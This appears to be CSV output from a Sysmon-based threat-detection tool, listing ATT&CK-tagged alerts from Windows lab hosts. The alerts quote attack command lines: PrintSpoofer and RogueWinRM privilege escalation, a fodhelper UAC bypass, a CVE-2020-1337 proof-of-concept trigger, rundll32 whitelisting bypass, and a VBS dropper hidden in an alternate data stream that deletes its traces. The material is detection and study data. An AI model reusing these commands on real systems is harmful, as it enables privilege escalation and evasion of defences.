SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 747F3D96-B592-5EAD-0000-0010D4CDC200 1428 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,User Name : ( NT AUTHORITY\SYSTEM ) with Command Line : ( "C:\Windows\system32\whoami.exe" ) contain suspicious command ( whoami.exe),1," 1 5 4 1 0 0x8000000000000000 110435 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-02 18:01:57.417 747F3D96-B595-5EAD-0000-00106BFDC200 6004 C:\Windows\System32\whoami.exe 10.0.17763.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami.exe "C:\Windows\system32\whoami.exe" C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-6ABB-5EAD-0000-0020E7030000 0x3e7 0 System SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 747F3D96-B592-5EAD-0000-0010D4CDC200 1428 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 342416 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-08-12 13:06:04.074 747F3D96-E93C-5F33-0000-0010A6F00E00 8032 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "C:\Windows\system32\cmd.exe" C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-E909-5F33-0000-0020E7030000 0x3e7 0 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-E93B-5F33-0000-001003BA0E00 7920 C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe -upload ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /name Microsoft.BackupAndRestoreCenter ),1," 1 5 4 1 0 0x8000000000000000 11267 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-09 03:25:24.677 365ABB72-9DA4-5CD3-0000-00107F7A2F00 2920 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" /name Microsoft.BackupAndRestoreCenter C:\Users\IEUser\AppData\Local\Temp\onedrive\ IEWIN7\IEUser 365ABB72-94CD-5CD3-0000-0020DD3A0100 0x13add 1 Medium SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-9DA4-5CD3-0000-00102E692F00 3184 C:\Windows\System32\sdclt.exe "C:\Windows\system32\sdclt.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557370343.531513,2019-05-09T06:52:23.531513+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /C "C:\Windows\wscript.exe "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" ),1," 1 5 4 1 0 0x8000000000000000 11242 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-09 02:52:23.515 365ABB72-95E7-5CD3-0000-001004970F00 3784 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /C "C:\Windows\wscript.exe "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" C:\Users\IEUser\AppData\Local\Temp\onedrive\ IEWIN7\IEUser 365ABB72-94CD-5CD3-0000-0020DD3A0100 0x13add 1 Medium SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-9570-5CD3-0000-00103FC90A00 1900 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436045.252684,2019-07-30T01:34:05.252684+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32 AllTheThings.dll,EntryPoint )",1," 1 5 4 1 0 0x8000000000000000 4965 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:05.213 747F3D96-664D-5D3F-0000-0010F1498C00 6836 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c rundll32 AllTheThings.dll,EntryPoint C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1088] Bypass User Account Control - Process,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 5277 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-03 10:14:08.401 747F3D96-5E70-5D45-0000-0010FCDD9D00 3656 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020B3D31800 0x18d3b3 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-5E6F-5D45-0000-001014CA9D00 8180 C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1561018068.92556,2019-06-20T12:07:48.925560+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd" ),1," 1 5 4 1 0 0x8000000000000000 8116 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-06-20 08:07:48.909 365ABB72-3ED4-5D0B-0000-0010B2871A00 1440 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "cmd" c:\ProgramData\ IEWIN7\IEUser 365ABB72-3991-5D0B-0000-002029350100 0x13529 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-3D05-5D0B-0000-001004220D00 816 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 5277 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-03 10:14:08.401 747F3D96-5E70-5D45-0000-0010FCDD9D00 3656 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020B3D31800 0x18d3b3 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-5E6F-5D45-0000-001014CA9D00 8180 C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1556610375.246489,2019-04-30T11:46:15.246489+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c echo msdhch > \\.\pipe\msdhch ),1," 1 5 4 1 0 0x8000000000000000 8575 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 07:46:15.183 365ABB72-FD47-5CC7-0000-00106AF61D00 4088 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c echo msdhch > \\.\pipe\msdhch C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-F6A1-5CC7-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-F6A1-5CC7-0000-001004550000 468 C:\Windows\System32\services.exe C:\Windows\system32\services.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include (powershell, -c , -i ,powershell) in event with Command Line (powershell.exe) and Parent Image :C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe , Parent CommandLine (PrintSpoofer.exe -i -c powershell.exe) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 110434 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-02 18:01:54.866 747F3D96-B592-5EAD-0000-0010D4CDC200 1428 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation PowerShell.EXE powershell.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-6ABB-5EAD-0000-0020E7030000 0x3e7 0 System SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-B592-5EAD-0000-0010ECCBC200 6760 C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe PrintSpoofer.exe -i -c powershell.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe ),1," 1 5 4 1 0 0x8000000000000000 110434 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-02 18:01:54.866 747F3D96-B592-5EAD-0000-0010D4CDC200 1428 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation PowerShell.EXE powershell.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-6ABB-5EAD-0000-0020E7030000 0x3e7 0 System SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-B592-5EAD-0000-0010ECCBC200 6760 C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe PrintSpoofer.exe -i -c powershell.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1," 1 5 4 1 0 0x8000000000000000 348 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:48:45.193 747F3D96-292D-5E1E-0000-0010F5597D00 3828 C:\Windows\explorer.exe 10.0.17763.348 (WinBuild.160101.0800) Windows Explorer Microsoft® Windows® Operating System Microsoft Corporation EXPLORER.EXE explorer ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-292D-5E1E-0000-0020CD587D00 0x7d58cd 0 High SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959 747F3D96-2910-5E1E-0000-0010F5F07C00 4612 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1," 1 5 4 1 0 0x8000000000000000 348 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:48:45.193 747F3D96-292D-5E1E-0000-0010F5597D00 3828 C:\Windows\explorer.exe 10.0.17763.348 (WinBuild.160101.0800) Windows Explorer Microsoft® Windows® Operating System Microsoft Corporation EXPLORER.EXE explorer ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-292D-5E1E-0000-0020CD587D00 0x7d58cd 0 High SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959 747F3D96-2910-5E1E-0000-0010F5F07C00 4612 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 2164892 Microsoft-Windows-Sysmon/Operational LAPTOP-JU4M3I0E 2020-10-05 20:43:58.450 00247C92-858E-5F7B-0000-0010E741202B 6636 C:\Windows\System32\cmd.exe 10.0.18362.449 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe C:\windows\ LAPTOP-JU4M3I0E\bouss 00247C92-8C36-5F75-0000-002034E39103 0x391e334 2 High SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 00247C92-858E-5F7B-0000-00105241202B 18404 C:\Windows\System32\Taskmgr.exe C:\windows\system32\taskmgr.exe ",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1597237564.075706,2020-08-12T17:06:04.075706+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" > nul 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 342414 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-08-12 13:06:03.484 747F3D96-E93B-5F33-0000-0010C1B40E00 7888 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\system32\cmd.exe /c schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" > nul 2>&1 C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ MSEDGEWIN10\IEUser 747F3D96-E911-5F33-0000-0020241C0400 0x41c24 1 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-E938-5F33-0000-00109CA00E00 7820 C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe WerTrigger.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1584766854.689567,2020-03-21T09:00:54.689567+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," 1 5 4 1 0 0x8000000000000000 243570 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:45.082 747F3D96-9F7D-5E75-0000-00104E062100 2484 C:\Windows\System32\whoami.exe 10.0.17763.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami.exe whoami C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 747F3D96-9F77-5E75-0000-001090F32000 2416 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1590282830.330775,2020-05-24T05:13:50.330775+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 196371 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-24 01:13:50.301 747F3D96-CA4E-5EC9-0000-00109FE23700 1516 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe c:\Windows\System32\cmd.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-BDD1-5EC9-0000-0020E7030000 0x3e7 1 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-CA4B-5EC9-0000-0010B8CB3700 3960 C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe RogueWinRM.exe -p c:\Windows\System32\cmd.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1561018068.909935,2019-06-20T12:07:48.909935+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd" ),1," 1 5 4 1 0 0x8000000000000000 8114 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-06-20 08:07:48.894 365ABB72-3ED4-5D0B-0000-00106C871A00 888 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "cmd" c:\ProgramData\ IEWIN7\IEUser 365ABB72-3991-5D0B-0000-002029350100 0x13529 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-3D05-5D0B-0000-001004220D00 816 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1597237564.051227,2020-08-12T17:06:04.051227+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 342413 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-08-12 13:06:02.548 747F3D96-E93A-5F33-0000-001014B30E00 7868 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ MSEDGEWIN10\IEUser 747F3D96-E911-5F33-0000-0020241C0400 0x41c24 1 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-E938-5F33-0000-00109CA00E00 7820 C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe WerTrigger.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557370343.500263,2019-05-09T06:52:23.500263+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /C "echo Dim objShell:Dim oFso:Set oFso = CreateObject("Scripting.FileSystemObject"):Set objShell = WScript.CreateObject("WScript.Shell"):command = "powershell.exe":objShell.Run command, 0:command = "C:\Windows\System32\cmd.exe /c ""start /b """" cmd /c ""timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest""""":objShell.Run command, 0:Set objShell = Nothing > "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" )",1," 1 5 4 1 0 0x8000000000000000 11238 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-09 02:52:23.484 365ABB72-95E7-5CD3-0000-001046950F00 2812 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /C "echo Dim objShell:Dim oFso:Set oFso = CreateObject("Scripting.FileSystemObject"):Set objShell = WScript.CreateObject("WScript.Shell"):command = "powershell.exe":objShell.Run command, 0:command = "C:\Windows\System32\cmd.exe /c ""start /b """" cmd /c ""timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest""""":objShell.Run command, 0:Set objShell = Nothing > "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" C:\Users\IEUser\AppData\Local\Temp\onedrive\ IEWIN7\IEUser 365ABB72-94CD-5CD3-0000-0020DD3A0100 0x13add 1 Medium SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-9570-5CD3-0000-00103FC90A00 1900 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948)",1," 1 5 4 1 0 0x8000000000000000 423994 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:57:36.012 747F3D96-51D0-5F93-0000-001036A15B00 3396 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 C:\Users\IEUser\AppData\Local\Temp\tmp1375\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002085A50800 0x8a585 1 High SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-51CD-5F93-0000-001073735B00 7624 C:\Users\Public\test.tmp c:\Users\Public\test.tmp ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ),1," 1 5 4 1 0 0x8000000000000000 423994 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:57:36.012 747F3D96-51D0-5F93-0000-001036A15B00 3396 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 C:\Users\IEUser\AppData\Local\Temp\tmp1375\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002085A50800 0x8a585 1 High SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-51CD-5F93-0000-001073735B00 7624 C:\Users\Public\test.tmp c:\Users\Public\test.tmp ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ),1," 1 5 4 1 0 0x8000000000000000 423994 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:57:36.012 747F3D96-51D0-5F93-0000-001036A15B00 3396 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 